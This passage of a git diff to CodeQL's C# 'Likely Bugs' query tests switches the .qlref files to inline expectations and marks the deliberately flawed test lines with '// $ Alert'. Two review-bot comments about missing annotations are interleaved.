Bugs/Collections/ContainerLengthCmpOffByOne/ContainerLengthCmpOffByOne.qlref index 637dac3c9b85..ce56c59063f7 100644 --- a/csharp/ql/test/query-tests/Likely Bugs/Collections/ContainerLengthCmpOffByOne/ContainerLengthCmpOffByOne.qlref 
+++ b/csharp/ql/test/query-tests/Likely Bugs/Collections/ContainerLengthCmpOffByOne/ContainerLengthCmpOffByOne.qlref @@ -1 +1,2 @@ -Likely Bugs/Collections/ContainerLengthCmpOffByOne.ql \ No newline at end of file +query: Likely Bugs/Collections/ContainerLengthCmpOffByOne.ql +postprocess: utils/test/InlineExpectationsTestQuery.ql diff --git a/csharp/ql/test/query-tests/Likely Bugs/Collections/ContainerSizeCmpZero/ContainerSizeCmpZero.cs b/csharp/ql/test/query-tests/Likely Bugs/Collections/ContainerSizeCmpZero/ContainerSizeCmpZero.cs index 1fb70bd8dff2..0713bb1bac92 100644 --- a/csharp/ql/test/query-tests/Likely Bugs/Collections/ContainerSizeCmpZero/ContainerSizeCmpZero.cs +++ b/csharp/ql/test/query-tests/Likely Bugs/Collections/ContainerSizeCmpZero/ContainerSizeCmpZero.cs @@ -29,16 +29,16 @@ static void Main(string[] args) // Arrays // NOT OK: always true - b = args.Length >= 0; + b = args.Length >= 0; // $ Alert // NOT OK: always true - b = 0 <= args.Length; + b = 0 <= args.Length; // $ Alert // NOT OK: always false - b = args.Length < 0; + b = args.Length < 0; // $ Alert // NOT OK: always false - b = 0 > args.Length; + b = 0 > args.Length; // $ Alert // OK: sometimes could be false b = args.Length > 0; @@ -58,12 +58,12 @@ static void Main(string[] args) var ys = new Stack(); // NOT OK - b = xs.Count >= 0; - b = 0 <= xs.Count; - b = 0 <= ys.Count; + b = xs.Count >= 0; // $ Alert + b = 0 <= xs.Count; // $ Alert + b = 0 <= ys.Count; // $ Alert - b = xs.Count < 0; - b = 0 > ys.Count; + b = xs.Count < 0; // $ Alert + b = 0 > ys.Count; // $ Alert // OK b = xs.Count >= -1; 
@@ -74,15 +74,15 @@ static void Main(string[] args) ///////// // missed in java, but not here - b = xs.Count >= (short)0; - b = xs.Count >= (byte)0; + b = xs.Count >= (short)0; // $ Alert + b = xs.Count >= (byte)0; // $ Alert ///////// // missed cases // NOT OK - b = xs.Count >= 0 + 0; - b = xs.Count >= 0 - 0; + b = xs.Count >= 0 + 0; // $ Alert + b = xs.Count >= 0 - 0; // $ Alert b = args.LongLength >= 0L; @@ -91,24 +91,24 @@ static void Main(string[] args) var zs = new MyList>(); // NOT OK - b = zs.Count >= 0; - b = zs.Count < 0; + b = zs.Count >= 0; // $ Alert + b = zs.Count < 0; // $ Alert // NOT OK - b = zs[0].Count >= 0; + b = zs[0].Count >= 0; // $ Alert // NOT OK - b = zs[0][0].Length >= 0; + b = zs[0][0].Length >= 0; // $ Alert ///////// // Dictionaries var ws = new Dictionary(); // NOT OK: Always true - b = ws.Count >= 0; + b = ws.Count >= 0; // $ Alert // NOT OK: Always true - b = 0 <= ws.Count; + b = 0 <= ws.Count; // $ Alert // OK: can be false b = ws.Count >= -1; @@ -123,12 +123,12 @@ static void Main(string[] args) var vs = new System.Collections.BitArray(1); // NOT OK: Always true - b = us.Count >= 0; - b = 0 > vs.Count; + b = us.Count >= 0; // $ Alert + b = 0 > vs.Count; // $ Alert // NOT OK: Always true - b = 0 <= us.Count; - b = vs.Count < 0; + b = 0 <= us.Count; // $ Alert + b = vs.Count < 0; // $ Alert // OK: can be false b = us.Count >= -1; @@ -144,13 +144,13 @@ static bool ReadOnlyCollection(IReadOnlyCollection xs, IReadOnlyList= 0; - b = 0 <= xs.Count; - b = 0 <= ys.Count; + b = xs.Count >= 0; // $ Alert + b = 0 <= xs.Count; // $ Alert + b = 0 <= ys.Count; // $ Alert - b = xs.Count < 0; - b = ys.Count < 0; - b = 0 > xs.Count; + b = xs.Count < 0; // $ Alert + b = ys.Count < 0; // $ Alert + b = 0 > xs.Count; // $ Alert return b; } @@ -158,6 +158,6 @@ static bool ReadOnlyCollection(IReadOnlyCollection xs, IReadOnlyList c) { Debug.Assert(c.Count >= 0); // OK - return c.Count >= 0; // NOT OK + return c.Count >= 0; // NOT OK // $ Alert } } 
diff --git a/csharp/ql/test/query-tests/Likely Bugs/Collections/ContainerSizeCmpZero/ContainerSizeCmpZero.qlref b/csharp/ql/test/query-tests/Likely Bugs/Collections/ContainerSizeCmpZero/ContainerSizeCmpZero.qlref index 17c0434a3a81..92952b25bdb6 100644 --- a/csharp/ql/test/query-tests/Likely Bugs/Collections/ContainerSizeCmpZero/ContainerSizeCmpZero.qlref +++ b/csharp/ql/test/query-tests/Likely Bugs/Collections/ContainerSizeCmpZero/ContainerSizeCmpZero.qlref @@ -1 +1,2 @@ -Likely Bugs/Collections/ContainerSizeCmpZero.ql \ No newline at end of file +query: Likely Bugs/Collections/ContainerSizeCmpZero.ql +postprocess: utils/test/InlineExpectationsTestQuery.ql diff --git a/csharp/ql/test/query-tests/Likely Bugs/DangerousNonShortCircuitLogic/DangerousNonShortCircuitLogic.cs b/csharp/ql/test/query-tests/Likely Bugs/DangerousNonShortCircuitLogic/DangerousNonShortCircuitLogic.cs index 0d10e11b7f63..40a1a3766926 100644 --- a/csharp/ql/test/query-tests/Likely Bugs/DangerousNonShortCircuitLogic/DangerousNonShortCircuitLogic.cs +++ b/csharp/ql/test/query-tests/Likely Bugs/DangerousNonShortCircuitLogic/DangerousNonShortCircuitLogic.cs @@ -12,10 +12,10 @@ void M() if (c != null ^ this.Field > 0) ; // GOOD if (c != null && c.Field > 0) ; // GOOD - if (c != null & c.Field > 0) ; // BAD - if (c == null | c.Property == "") ; // BAD - if (c == null | c[0]) ; // BAD - if (c == null | c.Method()) ; // BAD + if (c != null & c.Field > 0) ; // BAD // $ Alert + if (c == null | c.Property == "") ; // BAD // $ Alert + if (c == null | c[0]) ; // BAD // $ Alert + if (c == null | c.Method()) ; // BAD // $ Alert var b = true; b &= c.Method(); // GOOD diff --git a/csharp/ql/test/query-tests/Likely Bugs/DangerousNonShortCircuitLogic/DangerousNonShortCircuitLogic.qlref b/csharp/ql/test/query-tests/Likely Bugs/DangerousNonShortCircuitLogic/DangerousNonShortCircuitLogic.qlref index 6e192b5b73f1..c150d5b2bd61 100644 
--- a/csharp/ql/test/query-tests/Likely Bugs/DangerousNonShortCircuitLogic/DangerousNonShortCircuitLogic.qlref +++ b/csharp/ql/test/query-tests/Likely Bugs/DangerousNonShortCircuitLogic/DangerousNonShortCircuitLogic.qlref @@ -1 +1,2 @@ -Likely Bugs/DangerousNonShortCircuitLogic.ql \ No newline at end of file +query: Likely Bugs/DangerousNonShortCircuitLogic.ql +postprocess: utils/test/InlineExpectationsTestQuery.ql diff --git a/csharp/ql/test/query-tests/Likely Bugs/Dynamic/BadDynamicCall.qlref b/csharp/ql/test/query-tests/Likely Bugs/Dynamic/BadDynamicCall.qlref index e9490e9041ad..60268eb9d750 100644 --- a/csharp/ql/test/query-tests/Likely Bugs/Dynamic/BadDynamicCall.qlref +++ b/csharp/ql/test/query-tests/Likely Bugs/Dynamic/BadDynamicCall.qlref @@ -1 +1,2 @@ -Likely Bugs/Dynamic/BadDynamicCall.ql \ No newline at end of file +query: Likely Bugs/Dynamic/BadDynamicCall.ql +postprocess: utils/test/InlineExpectationsTestQuery.ql diff --git a/csharp/ql/test/query-tests/Likely Bugs/Dynamic/dynamic.cs b/csharp/ql/test/query-tests/Likely Bugs/Dynamic/dynamic.cs index 66626400b902..06f18e05320f 100644 --- a/csharp/ql/test/query-tests/Likely Bugs/Dynamic/dynamic.cs +++ b/csharp/ql/test/query-tests/Likely Bugs/Dynamic/dynamic.cs @@ -43,17 +43,17 @@ void TestCall() x.M5(1, new string[1]); // These are BAD: - x.M1(1); - x.M2(); - x.M2("", 1); - x.M2(1, "", 2.0); - x.M3(); - x.M3(1, 2, 3, 4); - x.M4(); - x.M4(1, 2); - x.M4(""); - x.M4(1, new object[1]); - x.M6(); + x.M1(1); // $ Alert + x.M2(); // $ Alert + x.M2("", 1); // $ Alert + x.M2(1, "", 2.0); // $ Alert + x.M3(); // $ Alert + x.M3(1, 2, 3, 4); // $ Alert + x.M4(); // $ Alert + x.M4(1, 2); // $ Alert + x.M4(""); // $ Alert + x.M4(1, new object[1]); // $ Alert + x.M6(); // $ Alert // These are GOOD: x.M7(2); 
@@ -61,8 +61,8 @@ void TestCall() x.M5(1, new string[] { "abc" }, new string[] { "def" }); // These are BAD: - x.M7(2, "abc"); - x.M8(1, new string[] { "abc" }, new string[] { "def" }); + x.M7(2, "abc"); // $ Alert + x.M8(1, new string[] { "abc" }, new string[] { "def" }); // $ Alert // These are GOOD: if ("" + "" == "") ; @@ -73,7 +73,7 @@ void TestCall() d -= 10; // These are BAD: - x = x + x; + x = x + x; // $ Alert // These are GOOD: dynamic d2 = GetI(); @@ -81,7 +81,7 @@ void TestCall() // These are BAD: dynamic d3 = GetI(); - d3.M(); + d3.M(); // $ Alert // These are GOOD dynamic d4 = ""; diff --git a/csharp/ql/test/query-tests/Likely Bugs/EqualsArray/EqualsArray.cs b/csharp/ql/test/query-tests/Likely Bugs/EqualsArray/EqualsArray.cs index dba87ee0450c..1639ee8f8445 100644 --- a/csharp/ql/test/query-tests/Likely Bugs/EqualsArray/EqualsArray.cs +++ b/csharp/ql/test/query-tests/Likely Bugs/EqualsArray/EqualsArray.cs @@ -8,7 +8,7 @@ public class Test // NOT OK public bool AreTheseMyNumbers(int[] numbers) { - return this.numbers.Equals(numbers); + return this.numbers.Equals(numbers); // $ Alert } // OK @@ -20,13 +20,13 @@ public bool HonestAreTheseMyNumbers(int[] numbers) // NOT OK (string is also IEnumerable) public bool Incomparable(string s) { - return numbers.Equals(s); + return numbers.Equals(s); // $ Alert } // NOT OK public bool CollectionEquals(IEnumerable c1) { - return c1.Equals(c1); + return c1.Equals(c1); // $ Alert } class CollectionImplementingIEnumerable1 : IEnumerable @@ -84,7 +84,7 @@ public override bool Equals(object other) // NOT OK: Nothing overrides Equals() bool OverriddenEquals(CollectionImplementingIEnumerable1 c) { - return c.Equals(c); + return c.Equals(c); // $ Alert } // OK: ImplementEquals overrides Equals() diff --git a/csharp/ql/test/query-tests/Likely Bugs/EqualsArray/EqualsArray.qlref b/csharp/ql/test/query-tests/Likely Bugs/EqualsArray/EqualsArray.qlref index d96256b3b972..8e560893a1de 100644 
--- a/csharp/ql/test/query-tests/Likely Bugs/EqualsArray/EqualsArray.qlref +++ b/csharp/ql/test/query-tests/Likely Bugs/EqualsArray/EqualsArray.qlref @@ -1 +1,2 @@ -Likely Bugs/EqualsArray.ql \ No newline at end of file +query: Likely Bugs/EqualsArray.ql +postprocess: utils/test/InlineExpectationsTestQuery.ql diff --git a/csharp/ql/test/query-tests/Likely Bugs/EqualsUsesAs/EqualsUsesAs.cs b/csharp/ql/test/query-tests/Likely Bugs/EqualsUsesAs/EqualsUsesAs.cs index f50ada45a414..4a44b2ecbb86 100644 --- a/csharp/ql/test/query-tests/Likely Bugs/EqualsUsesAs/EqualsUsesAs.cs +++ b/csharp/ql/test/query-tests/Likely Bugs/EqualsUsesAs/EqualsUsesAs.cs @@ -2,7 +2,7 @@ public class Test1 { public override bool Equals(object other) { - var otherTest = other as Test1; // BAD + var otherTest = other as Test1; // BAD // $ Alert return otherTest != null; } } diff --git a/csharp/ql/test/query-tests/Likely Bugs/EqualsUsesAs/EqualsUsesAs.qlref b/csharp/ql/test/query-tests/Likely Bugs/EqualsUsesAs/EqualsUsesAs.qlref index e3ec94efc2c9..269ea2e6e511 100644 --- a/csharp/ql/test/query-tests/Likely Bugs/EqualsUsesAs/EqualsUsesAs.qlref +++ b/csharp/ql/test/query-tests/Likely Bugs/EqualsUsesAs/EqualsUsesAs.qlref @@ -1 +1,2 @@ -Likely Bugs/EqualsUsesAs.ql \ No newline at end of file +query: Likely Bugs/EqualsUsesAs.ql +postprocess: utils/test/InlineExpectationsTestQuery.ql diff --git a/csharp/ql/test/query-tests/Likely Bugs/EqualsUsesIs/EqualsUsesIs.cs b/csharp/ql/test/query-tests/Likely Bugs/EqualsUsesIs/EqualsUsesIs.cs index 6e1db1bd05a2..356042e53893 100644 --- a/csharp/ql/test/query-tests/Likely Bugs/EqualsUsesIs/EqualsUsesIs.cs +++ b/csharp/ql/test/query-tests/Likely Bugs/EqualsUsesIs/EqualsUsesIs.cs @@ -2,7 +2,7 @@ public class Test1 { public override bool Equals(object other) { - return other is Test1; // BAD + return other is Test1; // BAD // $ Alert } } 
diff --git a/csharp/ql/test/query-tests/Likely Bugs/EqualsUsesIs/EqualsUsesIs.qlref b/csharp/ql/test/query-tests/Likely Bugs/EqualsUsesIs/EqualsUsesIs.qlref index 04003a637c0b..cbff9b573dd6 100644 --- a/csharp/ql/test/query-tests/Likely Bugs/EqualsUsesIs/EqualsUsesIs.qlref +++ b/csharp/ql/test/query-tests/Likely Bugs/EqualsUsesIs/EqualsUsesIs.qlref @@ -1 +1,2 @@ -Likely Bugs/EqualsUsesIs.ql \ No newline at end of file +query: Likely Bugs/EqualsUsesIs.ql +postprocess: utils/test/InlineExpectationsTestQuery.ql diff --git a/csharp/ql/test/query-tests/Likely Bugs/IncomparableEquals/IncomparableEquals.cs b/csharp/ql/test/query-tests/Likely Bugs/IncomparableEquals/IncomparableEquals.cs index cb9c97e8aa93..bdf92b4546a9 100644 --- a/csharp/ql/test/query-tests/Likely Bugs/IncomparableEquals/IncomparableEquals.cs +++ b/csharp/ql/test/query-tests/Likely Bugs/IncomparableEquals/IncomparableEquals.cs @@ -3,7 +3,7 @@ public class Test public bool M() { var x = new Test2(); - return this.Equals(x); // BAD + return this.Equals(x); // BAD // $ Alert } } diff --git a/csharp/ql/test/query-tests/Likely Bugs/IncomparableEquals/IncomparableEquals.qlref b/csharp/ql/test/query-tests/Likely Bugs/IncomparableEquals/IncomparableEquals.qlref index 96eae4e2eac5..91b47c6ddd94 100644 --- a/csharp/ql/test/query-tests/Likely Bugs/IncomparableEquals/IncomparableEquals.qlref +++ b/csharp/ql/test/query-tests/Likely Bugs/IncomparableEquals/IncomparableEquals.qlref @@ -1 +1,2 @@ -Likely Bugs/IncomparableEquals.ql \ No newline at end of file +query: Likely Bugs/IncomparableEquals.ql +postprocess: utils/test/InlineExpectationsTestQuery.ql diff --git a/csharp/ql/test/query-tests/Likely Bugs/InconsistentCompareTo/InconsistentCompareTo.cs b/csharp/ql/test/query-tests/Likely Bugs/InconsistentCompareTo/InconsistentCompareTo.cs index b405dc09e1f2..78a9749afebb 100644 --- a/csharp/ql/test/query-tests/Likely Bugs/InconsistentCompareTo/InconsistentCompareTo.cs 
+++ b/csharp/ql/test/query-tests/Likely Bugs/InconsistentCompareTo/InconsistentCompareTo.cs @@ -31,25 +31,25 @@ abstract class GoodComparableAbstract : IComparable public abstract int CompareTo(object other); } -class BadComparable : IComparable +class BadComparable : IComparable // $ Alert { public int CompareTo(object other) { return 0; } public override int GetHashCode() { return 0; } } -class BadComparableInt : IComparable +class BadComparableInt : IComparable // $ Alert { public int CompareTo(int x) { return 0; } public override int GetHashCode() { return 0; } } -class BadComparableT : IComparable +class BadComparableT : IComparable // $ Alert { public int CompareTo(T t) { return 0; } public override int GetHashCode() { return 0; } } -class BadComparableNewEquals : IComparable +class BadComparableNewEquals : IComparable // $ Alert { public int CompareTo(object other) { return 0; } public new bool Equals(object other) { return false; } diff --git a/csharp/ql/test/query-tests/Likely Bugs/InconsistentCompareTo/InconsistentCompareTo.qlref b/csharp/ql/test/query-tests/Likely Bugs/InconsistentCompareTo/InconsistentCompareTo.qlref index 5663237f6729..03552e829c86 100644 --- a/csharp/ql/test/query-tests/Likely Bugs/InconsistentCompareTo/InconsistentCompareTo.qlref +++ b/csharp/ql/test/query-tests/Likely Bugs/InconsistentCompareTo/InconsistentCompareTo.qlref @@ -1 +1,2 @@ -Likely Bugs/InconsistentCompareTo.ql \ No newline at end of file +query: Likely Bugs/InconsistentCompareTo.ql +postprocess: utils/test/InlineExpectationsTestQuery.ql diff --git a/csharp/ql/test/query-tests/Likely Bugs/MishandlingJapaneseEra/MishandlingJapaneseEra.qlref b/csharp/ql/test/query-tests/Likely Bugs/MishandlingJapaneseEra/MishandlingJapaneseEra.qlref index cf11ec925453..791b603a2e9f 100644 --- a/csharp/ql/test/query-tests/Likely Bugs/MishandlingJapaneseEra/MishandlingJapaneseEra.qlref +++ b/csharp/ql/test/query-tests/Likely Bugs/MishandlingJapaneseEra/MishandlingJapaneseEra.qlref 
@@ -1 +1,2 @@
-Likely Bugs/MishandlingJapaneseEra.ql
\ No newline at end of file
+query: Likely Bugs/MishandlingJapaneseEra.ql
+postprocess: utils/test/InlineExpectationsTestQuery.ql
diff --git a/csharp/ql/test/query-tests/Likely Bugs/MishandlingJapaneseEra/Program.cs b/csharp/ql/test/query-tests/Likely Bugs/MishandlingJapaneseEra/Program.cs
index 561b093f2308..9412593929a1 100644
--- a/csharp/ql/test/query-tests/Likely Bugs/MishandlingJapaneseEra/Program.cs
+++ b/csharp/ql/test/query-tests/Likely Bugs/MishandlingJapaneseEra/Program.cs
@@ -9,28 +9,28 @@ class Program static void Main(string[] args) { // BAD: hard-coded era start date - var henseiStart = new DateTime(1989, 1, 8); + var henseiStart = new DateTime(1989, 1, 8); // $ Alert // BAD: hard-coded era start dates, list - List listOfEraStart = new List { new DateTime(1989, 1, 8) }; + List listOfEraStart = new List { new DateTime(1989, 1, 8) }; // $ Alert // BAD: hardcoded era name string currentEra = "Heisei"; DateTimeOffset dateNow = DateTimeOffset.Now; - DateTimeOffset dateThisEra = new DateTimeOffset(1989, 1, 8, 0, 0, 0, 0, TimeSpan.Zero); + DateTimeOffset dateThisEra = new DateTimeOffset(1989, 1, 8, 0, 0, 0, 0, TimeSpan.Zero); // $ Alert CultureInfo japaneseCulture = CultureInfo.GetCultureInfo("ja-JP"); JapaneseCalendar jk = new JapaneseCalendar(); // BAD: datetime is created from constant year in the current era, and the result will change with era change - var datejkCurrentEra = jk.ToDateTime(32, 2, 1, 9, 9, 9, 9); + var datejkCurrentEra = jk.ToDateTime(32, 2, 1, 9, 9, 9, 9); // $ Alert Console.WriteLine("Date for datejkCurrentEra {0} and year {1}", datejkCurrentEra.ToString(japaneseCulture), jk.GetYear (datejkCurrentEra)); // BAD: datetime is created from constant year in the current era, and the result will change with era change - var datejk = jk.ToDateTime(32, 2, 1, 9, 9, 9, 9, 0); + var datejk = jk.ToDateTime(32, 2, 1, 9, 9, 9, 9, 0); // $ Alert Console.WriteLine("Date for jk {0} and year {1}", datejk.ToString(japaneseCulture), jk.GetYear (datejk)); // OK: datetime is created from constant year in the specific era, and the result will not change with era change 
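Review bot: The context line `string currentEra = "Heisei";` sits under a `// BAD: hardcoded era name` comment but gets no expectation, while every other BAD case in this hunk gains `// $ Alert`. Now that the test is checked through inline expectations, an unannotated line records nothing, so a reader cannot tell whether the query is meant to miss it. If the query should report the literal but does not, record the gap with `string currentEra = "Heisei"; // $ MISSING: Alert`; if it was never meant to, reword the comment instead. Which of the two applies is not visible from this hunk, and Main's body continues past it.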
@@ -46,7 +46,7 @@ static void Main(string[] args) Console.WriteLine("Which converts to year {0}", realYear); // BAD: creating DateTime using specified Japanese era date. This may yield a different date when era changes - DateTime val = new DateTime(32, 2, 1, new JapaneseCalendar()); + DateTime val = new DateTime(32, 2, 1, new JapaneseCalendar()); // $ Alert Console.WriteLine("DateTime from constructor {0}", val); // OK: variable data for Year, not necessarily hard-coded and can come from adjusted source diff --git a/csharp/ql/test/query-tests/Likely Bugs/NestedLoopsSameVariable/NestedLoopsSameVariable.cs b/csharp/ql/test/query-tests/Likely Bugs/NestedLoopsSameVariable/NestedLoopsSameVariable.cs index cd01795f202b..8dc1062d15b7 100644 --- a/csharp/ql/test/query-tests/Likely Bugs/NestedLoopsSameVariable/NestedLoopsSameVariable.cs +++ b/csharp/ql/test/query-tests/Likely Bugs/NestedLoopsSameVariable/NestedLoopsSameVariable.cs @@ -6,7 +6,7 @@ static void Main(string[] args) { for (int i = 0; i < 2; i++) { - for (int j = 0; j < 2; i++) + for (int j = 0; j < 2; i++) // $ Alert { Console.WriteLine(i + " " + j); } diff --git a/csharp/ql/test/query-tests/Likely Bugs/NestedLoopsSameVariable/NestedLoopsSameVariable.qlref b/csharp/ql/test/query-tests/Likely Bugs/NestedLoopsSameVariable/NestedLoopsSameVariable.qlref index c28b56d296d0..1e4470543922 100644 --- a/csharp/ql/test/query-tests/Likely Bugs/NestedLoopsSameVariable/NestedLoopsSameVariable.qlref +++ b/csharp/ql/test/query-tests/Likely Bugs/NestedLoopsSameVariable/NestedLoopsSameVariable.qlref @@ -1 +1,2 @@ -Likely Bugs/NestedLoopsSameVariable.ql \ No newline at end of file +query: Likely Bugs/NestedLoopsSameVariable.ql +postprocess: utils/test/InlineExpectationsTestQuery.ql diff --git a/csharp/ql/test/query-tests/Likely Bugs/NestedLoopsSameVariable/Test.cs b/csharp/ql/test/query-tests/Likely Bugs/NestedLoopsSameVariable/Test.cs index 7b08cd2c9145..671ffccb1d07 100644 
--- a/csharp/ql/test/query-tests/Likely Bugs/NestedLoopsSameVariable/Test.cs +++ b/csharp/ql/test/query-tests/Likely Bugs/NestedLoopsSameVariable/Test.cs @@ -19,7 +19,7 @@ void DifferentCondition1() for (int i=0; i<10; ++i) { // BAD: considered to be a different condition - for (; 10>i; ++i) + for (; 10>i; ++i) // $ Alert { Console.WriteLine(i); } @@ -31,7 +31,7 @@ void DifferentCondition2() for (int i=0; i<10; ++i) { // BAD: different condition - for (; i<9; ++i) + for (; i<9; ++i) // $ Alert { Console.WriteLine(i); } @@ -43,7 +43,7 @@ void DifferentConditions3() for (int i=0; i<10; ++i) { // BAD: different condition - for (; i<=10; ++i) + for (; i<=10; ++i) // $ Alert { Console.WriteLine(i); } @@ -54,7 +54,7 @@ void UseAfterInnerLoop() { for (int i=0; i<10; ++i) { - for (; i<10; ++i) + for (; i<10; ++i) // $ Alert { } diff --git a/csharp/ql/test/query-tests/Likely Bugs/ObjectComparison/ObjectComparison.cs b/csharp/ql/test/query-tests/Likely Bugs/ObjectComparison/ObjectComparison.cs index 2774b9229fb9..ec8284a7f91b 100644 --- a/csharp/ql/test/query-tests/Likely Bugs/ObjectComparison/ObjectComparison.cs +++ b/csharp/ql/test/query-tests/Likely Bugs/ObjectComparison/ObjectComparison.cs @@ -13,10 +13,10 @@ void M() ObjectComparisonTest y = new ObjectComparisonTest(); var b = x == y; // GOOD: but still reference equality - b = (object)x == y; // BAD - b = x == (object)y; // BAD - b = (I)x == y; // BAD - b = x == (I)y; // BAD + b = (object)x == y; // BAD // $ Alert + b = x == (object)y; // BAD // $ Alert + b = (I)x == y; // BAD // $ Alert + b = x == (I)y; // BAD // $ Alert b = (object)x == Field1; // GOOD b = Field1 == (object)x; // GOOD diff --git a/csharp/ql/test/query-tests/Likely Bugs/ObjectComparison/ObjectComparison.qlref b/csharp/ql/test/query-tests/Likely Bugs/ObjectComparison/ObjectComparison.qlref index 6f834d6d6548..e47228487204 100644 --- a/csharp/ql/test/query-tests/Likely Bugs/ObjectComparison/ObjectComparison.qlref 
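Review bot: In the `UseAfterInnerLoop` hunk the inner `for (; i<10; ++i)` now carries `// $ Alert` with no comment saying why it is reported, unlike the three hunks above it, which each keep a `// BAD: …` line. Adding one, for example `// BAD: inner loop advances the outer loop variable`, would keep the test file self-explanatory. That wording is inferred from the two loop headers and should be checked against what the query actually reports. The method body continues outside the hunk.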
+++ b/csharp/ql/test/query-tests/Likely Bugs/ObjectComparison/ObjectComparison.qlref @@ -1 +1,2 @@ -Likely Bugs/ObjectComparison.ql \ No newline at end of file +query: Likely Bugs/ObjectComparison.ql +postprocess: utils/test/InlineExpectationsTestQuery.ql diff --git a/csharp/ql/test/query-tests/Likely Bugs/PossibleLossOfPrecision/PossibleLossOfPrecision.cs b/csharp/ql/test/query-tests/Likely Bugs/PossibleLossOfPrecision/PossibleLossOfPrecision.cs index 9a5cdc7c4901..639e914e4799 100644 --- a/csharp/ql/test/query-tests/Likely Bugs/PossibleLossOfPrecision/PossibleLossOfPrecision.cs +++ b/csharp/ql/test/query-tests/Likely Bugs/PossibleLossOfPrecision/PossibleLossOfPrecision.cs @@ -11,18 +11,18 @@ static void main(string[] args) decimal dec; // These are BAD: - d = 1 / 2; - f = 1 / 2; - d = -1 / 2; - f = -2 / 3; - d = x / y; - f = x / y; - d = x / 2; - d = 4 / y; - d = 1.0 + 1 / 2; - d = 2.0 * (1 / 2); - d = 1 + 1 / 2 + 4 / 2; - d = 1 * (1 / 2); + d = 1 / 2; // $ Alert + f = 1 / 2; // $ Alert + d = -1 / 2; // $ Alert + f = -2 / 3; // $ Alert + d = x / y; // $ Alert + f = x / y; // $ Alert + d = x / 2; // $ Alert + d = 4 / y; // $ Alert + d = 1.0 + 1 / 2; // $ Alert + d = 2.0 * (1 / 2); // $ Alert + d = 1 + 1 / 2 + 4 / 2; // $ Alert + d = 1 * (1 / 2); // $ Alert // These are GOOD: d = 4 / 2; @@ -30,8 +30,8 @@ static void main(string[] args) i = 5 / 10; // These are BAD: - dec = 2 * i + 1; - dec = unchecked(int.MaxValue * int.MaxValue); + dec = 2 * i + 1; // $ Alert + dec = unchecked(int.MaxValue * int.MaxValue); // $ Alert // These are GOOD: dec = 2 * (uint)int.MaxValue - 1; diff --git a/csharp/ql/test/query-tests/Likely Bugs/PossibleLossOfPrecision/PossibleLossOfPrecision.qlref b/csharp/ql/test/query-tests/Likely Bugs/PossibleLossOfPrecision/PossibleLossOfPrecision.qlref index ecddf650e791..82a58e295a56 100644 --- a/csharp/ql/test/query-tests/Likely Bugs/PossibleLossOfPrecision/PossibleLossOfPrecision.qlref 
+++ b/csharp/ql/test/query-tests/Likely Bugs/PossibleLossOfPrecision/PossibleLossOfPrecision.qlref @@ -1 +1,2 @@ -Likely Bugs/PossibleLossOfPrecision.ql \ No newline at end of file +query: Likely Bugs/PossibleLossOfPrecision.ql +postprocess: utils/test/InlineExpectationsTestQuery.ql diff --git a/csharp/ql/test/query-tests/Likely Bugs/RandomUsedOnce/RandomUsedOnce.cs b/csharp/ql/test/query-tests/Likely Bugs/RandomUsedOnce/RandomUsedOnce.cs index fac7c9135af2..ce4a42b268f6 100644 --- a/csharp/ql/test/query-tests/Likely Bugs/RandomUsedOnce/RandomUsedOnce.cs +++ b/csharp/ql/test/query-tests/Likely Bugs/RandomUsedOnce/RandomUsedOnce.cs @@ -8,14 +8,14 @@ class RandomTest { void f() { - new Random().Next(); // BAD + new Random().Next(); // BAD // $ Alert byte[] buffer = new byte[10]; - new Random().NextBytes(buffer); // BAD + new Random().NextBytes(buffer); // BAD // $ Alert - new Random().NextDouble(); // BAD - new Random().Next(10); // BAD - new Random().Next(10, 20); // BAD + new Random().NextDouble(); // BAD // $ Alert + new Random().Next(10); // BAD // $ Alert + new Random().Next(10, 20); // BAD // $ Alert new Random().Equals(null); // GOOD } diff --git a/csharp/ql/test/query-tests/Likely Bugs/RandomUsedOnce/RandomUsedOnce.qlref b/csharp/ql/test/query-tests/Likely Bugs/RandomUsedOnce/RandomUsedOnce.qlref index bff453451145..f9bb6c3eeb50 100644 --- a/csharp/ql/test/query-tests/Likely Bugs/RandomUsedOnce/RandomUsedOnce.qlref +++ b/csharp/ql/test/query-tests/Likely Bugs/RandomUsedOnce/RandomUsedOnce.qlref @@ -1 +1,2 @@ -Likely Bugs/RandomUsedOnce.ql \ No newline at end of file +query: Likely Bugs/RandomUsedOnce.ql +postprocess: utils/test/InlineExpectationsTestQuery.ql diff --git a/csharp/ql/test/query-tests/Likely Bugs/RecursiveEquals/RecursiveEquals.cs b/csharp/ql/test/query-tests/Likely Bugs/RecursiveEquals/RecursiveEquals.cs index 3182dc8430c3..f97b22ed2241 100644 --- a/csharp/ql/test/query-tests/Likely Bugs/RecursiveEquals/RecursiveEquals.cs 
+++ b/csharp/ql/test/query-tests/Likely Bugs/RecursiveEquals/RecursiveEquals.cs @@ -6,7 +6,7 @@ class Bad public override bool Equals(object rhs) { if (rhs.GetType() != this.GetType()) return false; - return Equals(rhs); + return Equals(rhs); // $ Alert } public bool Equals(Bad rhs) diff --git a/csharp/ql/test/query-tests/Likely Bugs/RecursiveEquals/RecursiveEquals.qlref b/csharp/ql/test/query-tests/Likely Bugs/RecursiveEquals/RecursiveEquals.qlref index d78738e7f9d1..68a07bb347dd 100644 --- a/csharp/ql/test/query-tests/Likely Bugs/RecursiveEquals/RecursiveEquals.qlref +++ b/csharp/ql/test/query-tests/Likely Bugs/RecursiveEquals/RecursiveEquals.qlref @@ -1 +1,2 @@ -Likely Bugs/RecursiveEquals.ql \ No newline at end of file +query: Likely Bugs/RecursiveEquals.ql +postprocess: utils/test/InlineExpectationsTestQuery.ql diff --git a/csharp/ql/test/query-tests/Likely Bugs/SelfAssignment/SelfAssignment.qlref b/csharp/ql/test/query-tests/Likely Bugs/SelfAssignment/SelfAssignment.qlref index 28778bdd1c8b..82f6d5d9682b 100644 --- a/csharp/ql/test/query-tests/Likely Bugs/SelfAssignment/SelfAssignment.qlref +++ b/csharp/ql/test/query-tests/Likely Bugs/SelfAssignment/SelfAssignment.qlref @@ -1 +1,2 @@ -Likely Bugs/SelfAssignment.ql +query: Likely Bugs/SelfAssignment.ql +postprocess: utils/test/InlineExpectationsTestQuery.ql diff --git a/csharp/ql/test/query-tests/Likely Bugs/SelfAssignment/selfassigns.cs b/csharp/ql/test/query-tests/Likely Bugs/SelfAssignment/selfassigns.cs index 6d1387a5e1db..c65c39349b37 100644 --- a/csharp/ql/test/query-tests/Likely Bugs/SelfAssignment/selfassigns.cs +++ b/csharp/ql/test/query-tests/Likely Bugs/SelfAssignment/selfassigns.cs 
